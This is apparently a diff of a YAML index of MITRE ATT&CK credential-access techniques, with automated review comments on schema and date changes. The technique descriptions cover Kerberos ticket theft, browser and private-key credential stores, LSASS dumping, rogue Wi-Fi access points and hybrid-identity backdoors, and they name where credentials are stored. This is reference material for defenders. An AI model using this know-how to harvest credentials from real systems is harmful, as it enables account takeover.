technique:
- modified: '2024-03-01T16:58:02.395Z'
+ modified: '2024-09-17T19:49:11.455Z'
name: Steal or Forge Kerberos Tickets
description: |
Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
On Windows, the built-in klist
utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
- Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb
as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey
. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
- Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf
configuration file and the KRB5CCNAME
environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit
, klist
, ktutil
, and kcc
built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
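Review bot: In the T1558.004 block, `x_mitre_permissions_required: - User` is deleted with no replacement, alongside `spec_version: '2.1'` and the bump to `x_mitre_attack_spec_version: 3.2.0`; that matches the newer ATT&CK object shape, but any consumer of this index that filters on permissions_required will now return nothing for AS-REP Roasting, so worth a check. Separately, the parent T1558 description loses its Linux (`/var/lib/sss/secrets/secrets.ldb`, ccache) and macOS (KCM, `KRB5CCNAME`) paragraphs while the next hunk keeps Linux and macOS in `x_mitre_platforms`; that is consistent with the moved text living under the new sub-technique, just noting that the parent text is now Windows-only.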
@@ -45938,7 +46654,7 @@ credential-access:
- Windows
- Linux
- macOS
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Logon Session: Logon Session Metadata'
@@ -45963,13 +46679,6 @@ credential-access:
description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
using Azure Security Center. Retrieved March 23, 2018.
url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Kekeo
- description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
- url: https://github.com/gentilkiwi/kekeo
- - source_name: SpectorOps Bifrost Kerberos macOS 2019
- description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
- Retrieved October 6, 2021.
- url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
- source_name: Medium Detecting Attempts to Steal Passwords from Memory
description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
from Memory. Retrieved October 11, 2019.
@@ -45978,14 +46687,6 @@ credential-access:
description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
Attacks. Retrieved February 27, 2020.
url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
- - source_name: macOS kerberos framework MIT
- description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
- for Macintosh Preferences Documentation. Retrieved October 6, 2021.
- url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
- - source_name: MIT ccache
- description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
- Documentation: Credential Cache. Retrieved October 4, 2021.'
- url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -46007,23 +46708,14 @@ credential-access:
description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
Secret Decoder Ring. Retrieved February 27, 2020.
url: https://adsecurity.org/?p=227
- - source_name: Brining MimiKatz to Unix
- description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
- Mimikatz et al to UNIX. Retrieved October 13, 2021.
- url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
- - source_name: Linux Kerberos Tickets
- description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
- Teams. Retrieved October 4, 2021.
- url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555:
technique:
- modified: '2024-02-26T14:19:09.417Z'
+ modified: '2024-10-15T14:57:46.850Z'
name: Credentials from Password Stores
description: 'Adversaries may search for common password storage locations to
obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
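Review bot: The six sources removed from T1558's external_references across this and the two preceding hunks (Kekeo, SpectorOps Bifrost Kerberos macOS 2019, macOS kerberos framework MIT, MIT ccache, Brining MimiKatz to Unix, Linux Kerberos Tickets) are exactly the ones cited only in the Linux/macOS paragraphs dropped from its description, so no `(Citation: ...)` marker is left orphaned in what remains (the Secret Decoder Ring reference is still present as context). The dropped `spec_version: '2.1'` follows the same pattern as every other object in this change.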
@@ -46074,12 +46766,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555
atomic_tests: []
T1552:
technique:
- modified: '2024-04-15T21:33:12.892Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Unsecured Credentials
description: 'Adversaries may search compromised systems to find and obtain
insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -46091,6 +46782,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Austin Clark, @c2defense
x_mitre_deprecated: false
@@ -46105,18 +46797,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Application Log: Application Log Content'
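Review bot: The T1552 platform list swaps `Azure AD`, `Office 365` and `Google Workspace` for `Office Suite` and `Identity Provider` (with `x_mitre_version` bumped to 1.4), which is the upstream platform consolidation; any per-platform index in this repo that is still keyed on the old names will silently stop matching this technique, so those generators should be checked against the new names. Also, `x_mitre_modified_by_ref` is re-inserted here after sitting at the tail of the object; harmless for YAML, but it makes the diff mostly reordering noise.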
@@ -46139,37 +46831,115 @@ credential-access:
url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ identifier: T1552
+ atomic_tests: []
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- identifier: T1552
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
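Review bot: The new T1557.004 (Evil Twin) entry ends with `x_mitre_attack_spec_version`, `x_mitre_modified_by_ref`, `atomic_tests: []` and no `identifier:` key, while the T1552 block just above gets `identifier: T1552` re-added before its `atomic_tests`; the file is already mixed on this (T1558.004 and T1552 carry the key, T1558 and T1556.007 do not), so confirm the generator treats it as optional or add `identifier: T1557.004` for consistency. Two smaller upstream issues worth an upstream fix rather than a local edit: the description reads "the adversary may able to monitor" (missing "be") and ends with a trailing space, and `x_mitre_detection` is the empty string, so the sub-technique ships with no detection guidance. The `Australia ‘Evil Twin’` source_name uses curly quotes; it matches the `(Citation: Australia ‘Evil Twin’)` marker in the description byte for byte, which is what matters, but it is fragile under any tooling that normalises quotes.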
@@ -46177,9 +46947,9 @@ credential-access:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -46188,21 +46958,22 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -46242,55 +47013,10 @@ credential-access:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ryan Benson, Exabeam
- - Barry Shteiman, Exabeam
- - Sylvain Gil, Exabeam
- - RedHuntLabs, @redhuntlabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
- type: attack-pattern
- created: '2020-02-12T18:57:36.041Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1555.003
- url: https://attack.mitre.org/techniques/T1555/003
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Microsoft CryptUnprotectData April 2018
- url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
- description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
- June 18, 2019.
- - source_name: Proofpoint Vega Credential Stealer May 2018
- url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
- description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
- in targeted campaign . Retrieved June 18, 2019.
- - source_name: FireEye HawkEye Malware July 2017
- url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
- description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
- Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
- 2019.
- - source_name: GitHub Mimikittenz July 2016
- url: https://github.com/putterpanda/mimikittenz
- description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
- Retrieved June 20, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-15T14:13:45.294Z'
name: 'Credentials from Password Stores: Credentials from Web Browsers'
description: "Adversaries may acquire credentials from web browsers by reading
files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
@@ -46320,6 +47046,12 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ryan Benson, Exabeam
+ - Barry Shteiman, Exabeam
+ - Sylvain Gil, Exabeam
+ - RedHuntLabs, @redhuntlabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Identify web browser files that contain credentials such
as Google Chrome’s Login Data database file: AppData\Local\Google\Chrome\User
Data\Default\Login Data
. Monitor file read events of web browser files
@@ -46329,23 +47061,58 @@ credential-access:
reading web browser process memory, utilizing regular expressions, and those
that contain numerous keywords for common web applications (Gmail, Twitter,
Office365, etc.).'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Access'
- 'File: File Access'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+ created: '2020-02-12T18:57:36.041Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/003
+ external_id: T1555.003
+ - source_name: GitHub Mimikittenz July 2016
+ description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+ Retrieved June 20, 2019.
+ url: https://github.com/putterpanda/mimikittenz
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Microsoft CryptUnprotectData April 2018
+ description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+ June 18, 2019.
+ url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+ - source_name: Proofpoint Vega Credential Stealer May 2018
+ description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+ in targeted campaign . Retrieved June 18, 2019.
+ url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+ - source_name: FireEye HawkEye Malware July 2017
+ description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+ Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+ 2019.
+ url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1555.003
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
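Review bot: The large deletion of T1555.003's platforms, domains, contributors, marking refs, id/type/created and external_references in the `@@ -46242,55` hunk above is reinstated here and in the previous hunk with the same values (same `attack-pattern--58a3e6aa-...` id, same four contributors, all six references with Mimikittenz moved to the front, plus a new `revoked: false`), so nothing is lost; the substantive changes are `x_mitre_version` 1.1 to 1.2, `modified` to 2024-08-15, `x_mitre_attack_spec_version` 2.1.0 to 3.2.0 and the dropped `x_mitre_permissions_required` and `spec_version`. A version bump normally accompanies a text change, and the description diff for this object is not in this region, so verify it upstream rather than assume.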
@@ -46382,23 +47149,23 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -46431,21 +47198,20 @@ credential-access:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.004:
technique:
- modified: '2023-04-12T23:52:08.194Z'
+ modified: '2024-10-04T11:31:56.622Z'
name: 'Unsecured Credentials: Private Keys'
description: "Adversaries may search for private key certificate files on compromised
systems for insecurely stored credentials. Private cryptographic keys and
@@ -46456,7 +47222,7 @@ credential-access:
as ~/.ssh
for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\
on Windows. Adversary tools may also search compromised systems for file extensions
relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
- Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+ Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
device key and a transport key are generated and used to verify the device’s
identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -46490,7 +47256,7 @@ credential-access:
- macOS
- Windows
- Network
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
@@ -46518,7 +47284,7 @@ credential-access:
- source_name: Kaspersky Careto
description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
Masked APT. Retrieved July 5, 2017.
- url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+ url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
- source_name: Microsoft Primary Refresh Token
description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
Retrieved February 21, 2023.
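Review bot: the Kaspersky Careto reference now points at a web.archive.org snapshot of the PDF, but the description on the preceding context lines still reads "Retrieved July 5, 2017." Elsewhere in this diff a changed URL comes with an updated retrieval date (the External to DA and AWS-ADFS references), so either update the date here as well or make the description say the archived copy is the same document retrieved on the original date.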
@@ -46529,14 +47295,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Public-key_cryptography
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.004
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
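Review bot: the modified timestamp for T1557.001 moves backwards, from '2023-04-25T14:00:00.188Z' to '2022-10-25T15:46:55.393Z', and the same happens for T1558.001 and T1556.008 further down. The old values share the 14:00:00.188Z time, which looks like a release-level batch timestamp, while the new values look like per-object modification times taken from the ATT&CK STIX bundle. Confirm that the generator is now reading the object's own modified field, and check that nothing downstream uses modified as a monotonic "newer than" signal for cache invalidation, since those consumers would treat these objects as stale.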
@@ -46644,12 +47409,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1003.001:
technique:
- modified: '2023-12-27T17:57:20.003Z'
+ modified: '2024-08-13T13:52:45.379Z'
name: 'OS Credential Dumping: LSASS Memory'
description: |
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -46686,6 +47450,7 @@ credential-access:
- Edward Millington
- Ed Williams, Trustwave, SpiderLabs
- Olaf Hartong, Falcon Force
+ - Michael Forret, Quorum Cyber
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -46698,7 +47463,7 @@ credential-access:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Access'
- 'Windows Registry: Windows Registry Key Modification'
